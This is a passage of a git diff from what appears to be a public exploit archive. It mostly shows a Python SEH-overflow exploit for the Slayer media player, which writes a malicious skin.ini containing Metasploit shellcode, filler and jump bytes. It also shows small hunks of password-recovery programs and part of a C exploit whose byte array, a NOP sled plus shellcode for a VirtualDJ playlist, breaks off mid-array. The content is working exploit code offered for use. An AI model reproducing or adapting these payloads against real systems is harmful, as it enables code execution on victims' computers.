-"\x42\x5f\x53\x54\x4f\x50\x2c\x32\x32\x34\x2c\x37\x36\x2c\x32\x34\x2c\x31\x36\x2c" -"\x53\x74\x6f\x70\x2c\x46\x41\x4c\x53\x45\x0a\x31\x32\x3d\x42\x5f\x50\x4c\x41\x59" -"\x2c\x31\x39\x39\x2c\x37\x36\x2c\x32\x34\x2c\x31\x36\x2c\x50\x6c\x61\x79\x2c\x46" -"\x41\x4c\x53\x45\x0a\x0a\x5b\x50\x52\x4f\x47\x52\x45\x53\x53\x49\x4e\x46\x4f\x5d" -"\x0a\x31\x3d\x50\x52\x4f\x47\x52\x45\x53\x53\x5f\x50\x4f\x53\x2c\x2c\x31\x34\x39" -"\x2c\x37\x30\x2c\x32\x34\x34\x2c\x34\x2c\x56\x0a\x0a\x5b\x54\x45\x58\x54\x49\x4e" -"\x46\x4f\x5d\x0a\x31\x3d\x54\x45\x58\x54\x5f\x53\x4c\x41\x59\x45\x52\x2c\x41\x72" -"\x69\x61\x6c\x2c\x54\x52\x55\x45\x2c\x54\x52\x55\x45\x2c\x2d\x31\x33\x2c\x38\x33" -"\x38\x38\x36\x30\x38\x2c\x31\x36\x30\x2c\x32\x35\x2c\x38\x30\x2c\x31\x35\x2c\x0a" -"\x32\x3d\x54\x45\x58\x54\x5f\x43\x4c\x49\x50\x5f\x4e\x41\x4d\x45\x2c\x41\x72\x69" -"\x61\x6c\x2c\x46\x41\x4c\x53\x45\x2c\x54\x52\x55\x45\x2c\x2d\x31\x31\x2c\x31\x36" -"\x37\x31\x31\x36\x38\x30\x2c\x31\x36\x31\x2c\x34\x30\x2c\x32\x31\x38\x2c\x31\x35" -"\x2c\x0a\x33\x3d\x54\x45\x58\x54\x5f\x50\x4f\x53\x2c\x41\x72\x69\x61\x6c\x2c\x46" -"\x41\x4c\x53\x45\x2c\x54\x52\x55\x45\x2c\x2d\x31\x31\x2c\x31\x36\x37\x31\x31\x36" 
-"\x38\x30\x2c\x32\x34\x30\x2c\x32\x35\x2c\x31\x36\x30\x2c\x31\x35\x2c\x0a\x34\x3d" -"\x54\x45\x58\x54\x5f\x43\x4c\x49\x50\x5f\x49\x4e\x46\x4f\x2c\x41\x72\x69\x61\x6c" -"\x2c\x46\x41\x4c\x53\x45\x2c\x54\x52\x55\x45\x2c\x2d\x31\x31\x2c\x31\x36\x37\x31" -"\x31\x36\x38\x30\x2c\x31\x36\x31\x2c\x35\x35\x2c\x35\x30\x2c\x31\x35\x2c\x0a\x35" -"\x3d\x54\x45\x58\x54\x5f\x54\x49\x50\x2c\x41\x72\x69\x61\x6c\x2c\x46\x41\x4c\x53" -"\x45\x2c\x54\x52\x55\x45\x2c\x2d\x31\x31\x2c\x32\x35\x35\x2c\x33\x30\x30\x2c\x35" -"\x35\x2c\x35\x30\x2c\x31\x35\x2c\x0a") - -# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com -shellcode=( -"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1e" -"\xc7\xd0\x3c\x83\xeb\xfc\xe2\xf4\xe2\x2f\x94\x3c\x1e\xc7\x5b\x79" -"\x22\x4c\xac\x39\x66\xc6\x3f\xb7\x51\xdf\x5b\x63\x3e\xc6\x3b\x75" -"\x95\xf3\x5b\x3d\xf0\xf6\x10\xa5\xb2\x43\x10\x48\x19\x06\x1a\x31" -"\x1f\x05\x3b\xc8\x25\x93\xf4\x38\x6b\x22\x5b\x63\x3a\xc6\x3b\x5a" -"\x95\xcb\x9b\xb7\x41\xdb\xd1\xd7\x95\xdb\x5b\x3d\xf5\x4e\x8c\x18" -"\x1a\x04\xe1\xfc\x7a\x4c\x90\x0c\x9b\x07\xa8\x30\x95\x87\xdc\xb7" -"\x6e\xdb\x7d\xb7\x76\xcf\x3b\x35\x95\x47\x60\x3c\x1e\xc7\x5b\x54" -"\x22\x98\xe1\xca\x7e\x91\x59\xc4\x9d\x07\xab\x6c\x76\x37\x5a\x38" -"\x41\xaf\x48\xc2\x94\xc9\x87\xc3\xf9\xa4\xb1\x50\x7d\xc7\xd0\x3c") - -payload = header1 -payload += "\x41"*(348-len(shellcode)) -payload += shellcode -payload += "\xE9\x5B\xFF\xFF\xFF" -payload += "\x90"*15 -payload += "\xEB\xEA\xFF\xFF" -payload += "\x50\x37\x40" -payload += header2 -try: - os.mkdir("sunhouse") - out_file = open(r'SuNHouSe/skin.ini', 'w') - out_file.write(payload) - out_file.close() - raw_input("\nExploit file created!\n") -except: - print "Error" - -# milw0rm.com [2009-05-26] +#!/usr/bin/python +print "**************************************************************************" +print "[~]Slayer v2.4 (skin) Universal Seh Overflow Exploit (SEH)\n" +print "[~]AUTHOR: SuNHouSe2 [ALGERIAN HaCkEr]\n" +print 
"[~]Email : sunhouse2@yahoo.com\n" +print "[~]HOME : http://www.snakespc.com\n" +print "[~]Tested on: Windows XP Pro SP3 (FR)\n" +print "[~]Special ThanX : His0k4,& ALL Snakespc.com Members\n" +print "**************************************************************************" + +import os + +header1=( +"\x5b\x53\x43\x52\x45\x45\x4e\x5d\x0a\x4d\x61\x73\x6b\x3d\x2e\x2e\x2f\x61\x62\x64" +"\x2f\x6d\x61\x73\x6b\x2e\x62\x6d\x70\x0a\x4d\x61\x69\x6e\x3d\x2e\x2e\x2f\x61\x62" +"\x64\x2f\x6d\x61\x69\x6e\x2e\x6a\x70\x67\x0a\x44\x6f\x77\x6e\x3d\x2e\x2e\x2f\x61" +"\x62\x64\x2f\x53\x65\x6c\x65\x63\x74\x65\x64\x2e\x6a\x70\x67\x0a\x4f\x76\x65\x72" +"\x3d\x2e\x2e\x2f\x61\x62\x64\x2f\x4f\x76\x65\x72\x2e\x6a\x70\x67\x0a\x44\x69\x73" +"\x61\x62\x6c\x65\x64\x3d\x2e\x2e\x2f\x61\x62\x64\x2f\x6d\x61\x69\x6e\x2e\x6a\x70" +"\x67\x0a\x0a\x5b\x42\x55\x54\x54\x4f\x4e\x49\x4e\x46\x4f\x5d\x0a\x31\x3d") + +header2=( +"\x2c\x33\x32\x34\x2c\x37\x36\x2c\x32\x34\x2c\x31\x36\x2c\x43\x6f\x6e\x66\x69\x67" +"\x75\x72\x61\x74\x69\x6f\x6e\x2c\x46\x41\x4c\x53\x45\x0a\x32\x3d\x42\x5f\x56\x4f" +"\x42\x2c\x32\x39\x2c\x33\x31\x2c\x31\x34\x2c\x31\x35\x2c\x4c\x61\x6e\x67\x75\x61" +"\x67\x65\x20\x53\x65\x6c\x65\x63\x74\x69\x6f\x6e\x2c\x46\x41\x4c\x53\x45\x0a\x33" +"\x3d\x42\x5f\x50\x4c\x41\x59\x4c\x49\x53\x54\x2c\x37\x30\x2c\x34\x39\x2c\x31\x34" +"\x2c\x31\x35\x2c\x50\x6c\x61\x79\x6c\x69\x73\x74\x2c\x46\x41\x4c\x53\x45\x0a\x34" +"\x3d\x42\x5f\x4d\x55\x54\x45\x2c\x36\x34\x2c\x37\x35\x2c\x31\x34\x2c\x31\x35\x2c" +"\x4d\x75\x74\x65\x2c\x46\x41\x4c\x53\x45\x0a\x35\x3d\x42\x5f\x46\x55\x4c\x4c\x53" +"\x43\x52\x45\x45\x4e\x2c\x37\x32\x2c\x32\x36\x2c\x31\x34\x2c\x31\x35\x2c\x46\x75" +"\x6c\x6c\x73\x63\x72\x65\x65\x6e\x2c\x46\x41\x4c\x53\x45\x0a\x36\x3d\x42\x5f\x41" +"\x42\x4f\x55\x54\x2c\x33\x34\x2c\x38\x36\x2c\x31\x33\x2c\x31\x33\x2c\x41\x62\x6f" +"\x75\x74\x2c\x46\x41\x4c\x53\x45\x0a\x37\x3d\x42\x5f\x4f\x50\x45\x4e\x2c\x32\x39" +"\x39\x2c\x37\x36\x2c\x32\x34\x2c\x31\x36\x2c\x4f\x70\x65\x6e\x2c\x46\x41\x4c\x53" 
+"\x45\x0a\x38\x3d\x42\x5f\x43\x4c\x4f\x53\x45\x2c\x34\x32\x33\x2c\x35\x2c\x31\x32" +"\x2c\x31\x30\x2c\x43\x6c\x6f\x73\x65\x2c\x46\x41\x4c\x53\x45\x0a\x39\x3d\x42\x5f" +"\x50\x52\x45\x56\x2c\x32\x34\x39\x2c\x37\x36\x2c\x32\x34\x2c\x31\x36\x2c\x50\x72" +"\x65\x76\x69\x6f\x75\x73\x20\x43\x6c\x69\x70\x2c\x46\x41\x4c\x53\x45\x0a\x31\x30" +"\x3d\x42\x5f\x4e\x45\x58\x54\x2c\x32\x37\x34\x2c\x37\x36\x2c\x32\x34\x2c\x31\x36" +"\x2c\x4e\x65\x78\x74\x20\x43\x6c\x69\x70\x2c\x46\x41\x4c\x53\x45\x0a\x31\x31\x3d" +"\x42\x5f\x53\x54\x4f\x50\x2c\x32\x32\x34\x2c\x37\x36\x2c\x32\x34\x2c\x31\x36\x2c" +"\x53\x74\x6f\x70\x2c\x46\x41\x4c\x53\x45\x0a\x31\x32\x3d\x42\x5f\x50\x4c\x41\x59" +"\x2c\x31\x39\x39\x2c\x37\x36\x2c\x32\x34\x2c\x31\x36\x2c\x50\x6c\x61\x79\x2c\x46" +"\x41\x4c\x53\x45\x0a\x0a\x5b\x50\x52\x4f\x47\x52\x45\x53\x53\x49\x4e\x46\x4f\x5d" +"\x0a\x31\x3d\x50\x52\x4f\x47\x52\x45\x53\x53\x5f\x50\x4f\x53\x2c\x2c\x31\x34\x39" +"\x2c\x37\x30\x2c\x32\x34\x34\x2c\x34\x2c\x56\x0a\x0a\x5b\x54\x45\x58\x54\x49\x4e" +"\x46\x4f\x5d\x0a\x31\x3d\x54\x45\x58\x54\x5f\x53\x4c\x41\x59\x45\x52\x2c\x41\x72" +"\x69\x61\x6c\x2c\x54\x52\x55\x45\x2c\x54\x52\x55\x45\x2c\x2d\x31\x33\x2c\x38\x33" +"\x38\x38\x36\x30\x38\x2c\x31\x36\x30\x2c\x32\x35\x2c\x38\x30\x2c\x31\x35\x2c\x0a" +"\x32\x3d\x54\x45\x58\x54\x5f\x43\x4c\x49\x50\x5f\x4e\x41\x4d\x45\x2c\x41\x72\x69" +"\x61\x6c\x2c\x46\x41\x4c\x53\x45\x2c\x54\x52\x55\x45\x2c\x2d\x31\x31\x2c\x31\x36" +"\x37\x31\x31\x36\x38\x30\x2c\x31\x36\x31\x2c\x34\x30\x2c\x32\x31\x38\x2c\x31\x35" +"\x2c\x0a\x33\x3d\x54\x45\x58\x54\x5f\x50\x4f\x53\x2c\x41\x72\x69\x61\x6c\x2c\x46" +"\x41\x4c\x53\x45\x2c\x54\x52\x55\x45\x2c\x2d\x31\x31\x2c\x31\x36\x37\x31\x31\x36" +"\x38\x30\x2c\x32\x34\x30\x2c\x32\x35\x2c\x31\x36\x30\x2c\x31\x35\x2c\x0a\x34\x3d" +"\x54\x45\x58\x54\x5f\x43\x4c\x49\x50\x5f\x49\x4e\x46\x4f\x2c\x41\x72\x69\x61\x6c" +"\x2c\x46\x41\x4c\x53\x45\x2c\x54\x52\x55\x45\x2c\x2d\x31\x31\x2c\x31\x36\x37\x31" 
+"\x31\x36\x38\x30\x2c\x31\x36\x31\x2c\x35\x35\x2c\x35\x30\x2c\x31\x35\x2c\x0a\x35" +"\x3d\x54\x45\x58\x54\x5f\x54\x49\x50\x2c\x41\x72\x69\x61\x6c\x2c\x46\x41\x4c\x53" +"\x45\x2c\x54\x52\x55\x45\x2c\x2d\x31\x31\x2c\x32\x35\x35\x2c\x33\x30\x30\x2c\x35" +"\x35\x2c\x35\x30\x2c\x31\x35\x2c\x0a") + +# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com +shellcode=( +"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1e" +"\xc7\xd0\x3c\x83\xeb\xfc\xe2\xf4\xe2\x2f\x94\x3c\x1e\xc7\x5b\x79" +"\x22\x4c\xac\x39\x66\xc6\x3f\xb7\x51\xdf\x5b\x63\x3e\xc6\x3b\x75" +"\x95\xf3\x5b\x3d\xf0\xf6\x10\xa5\xb2\x43\x10\x48\x19\x06\x1a\x31" +"\x1f\x05\x3b\xc8\x25\x93\xf4\x38\x6b\x22\x5b\x63\x3a\xc6\x3b\x5a" +"\x95\xcb\x9b\xb7\x41\xdb\xd1\xd7\x95\xdb\x5b\x3d\xf5\x4e\x8c\x18" +"\x1a\x04\xe1\xfc\x7a\x4c\x90\x0c\x9b\x07\xa8\x30\x95\x87\xdc\xb7" +"\x6e\xdb\x7d\xb7\x76\xcf\x3b\x35\x95\x47\x60\x3c\x1e\xc7\x5b\x54" +"\x22\x98\xe1\xca\x7e\x91\x59\xc4\x9d\x07\xab\x6c\x76\x37\x5a\x38" +"\x41\xaf\x48\xc2\x94\xc9\x87\xc3\xf9\xa4\xb1\x50\x7d\xc7\xd0\x3c") + +payload = header1 +payload += "\x41"*(348-len(shellcode)) +payload += shellcode +payload += "\xE9\x5B\xFF\xFF\xFF" +payload += "\x90"*15 +payload += "\xEB\xEA\xFF\xFF" +payload += "\x50\x37\x40" +payload += header2 +try: + os.mkdir("sunhouse") + out_file = open(r'SuNHouSe/skin.ini', 'w') + out_file.write(payload) + out_file.close() + raw_input("\nExploit file created!\n") +except: + print "Error" + +# milw0rm.com [2009-05-26] diff --git a/platforms/windows/local/884.cpp b/platforms/windows/local/884.cpp index 03496d1aa..d2c52402d 100755 --- a/platforms/windows/local/884.cpp +++ b/platforms/windows/local/884.cpp @@ -109,6 +109,6 @@ strcpy(pwdfile,strcat(prgfiles,"\\TheSnookerClub\\iSnooker\\MyDetails.txt")); printf("Password : %s\n",password); return 0; -} - -// milw0rm.com [2005-03-16] +} + +// milw0rm.com [2005-03-16] 
diff --git a/platforms/windows/local/885.cpp b/platforms/windows/local/885.cpp index ac275f3a3..422d5b82b 100755 --- a/platforms/windows/local/885.cpp +++ b/platforms/windows/local/885.cpp @@ -108,6 +108,6 @@ int main() printf("Password : %s\n",password); return 0; -} - -// milw0rm.com [2005-03-16] +} + +// milw0rm.com [2005-03-16] diff --git a/platforms/windows/local/8863.c b/platforms/windows/local/8863.c index 056aaa542..f76248740 100755 --- a/platforms/windows/local/8863.c +++ b/platforms/windows/local/8863.c 
@@ -1,141 +1,141 @@ -#include -#include -#include -#include -#include - -unsigned char rawData[] = -{ - 0x23, 0x56, 0x69, 0x72, 0x74, 0x75, 0x61, 0x6C, 0x44, 0x4A, 0x20, 0x50, 0x6C, 0x61, 0x79, 0x6C, - 0x69, 0x73, 0x74, 0x0D, 0x0A, 0x23, 0x4D, 0x69, 0x78, 0x54, 0x79, 0x70, 0x65, 0x3D, 0x53, 0x6D, - 0x61, 0x72, 0x74, 0x0D, 0x0A, 0x49, 0x3A, 0x5C, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, - 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, - 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, - 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, - 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, - 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, - 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, - 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, - 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, - 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, - 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, - 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, - 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, - 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, - 0x58, 0x58, 0x58, 0x58, 0x58, 
0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, - 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, - 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, - 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, - 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, - 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, - 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, - 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, - 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, - 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, - 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, - 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, - 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, - 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, - 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x59, 0x59, 0x59, - 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, - 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, - 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, - 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, - 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, - 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
0x59, 0x59, 0x59, 0x59, 0x59, - 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, - 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, - 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, - 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, - 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, - 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, - 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, - 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, - 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, - 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, - 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, - 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, - 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, - 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, - 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, - 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, - 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, - 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, - 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, - 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, - 0x59, 
0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, - 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, - 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, - 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0xF0, - 0x69, 0x83, 0x7C, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0xEB, 0x03, 0x59, 0xEB, 0x05, 0xE8, 0xF8, 0xFF, 0xFF, 0xFF, 0x49, 0x49, 0x49, 0x49, - 0x49, 0x49, 0x49, 0x49, 0x49, 0x49, 0x49, 0x49, 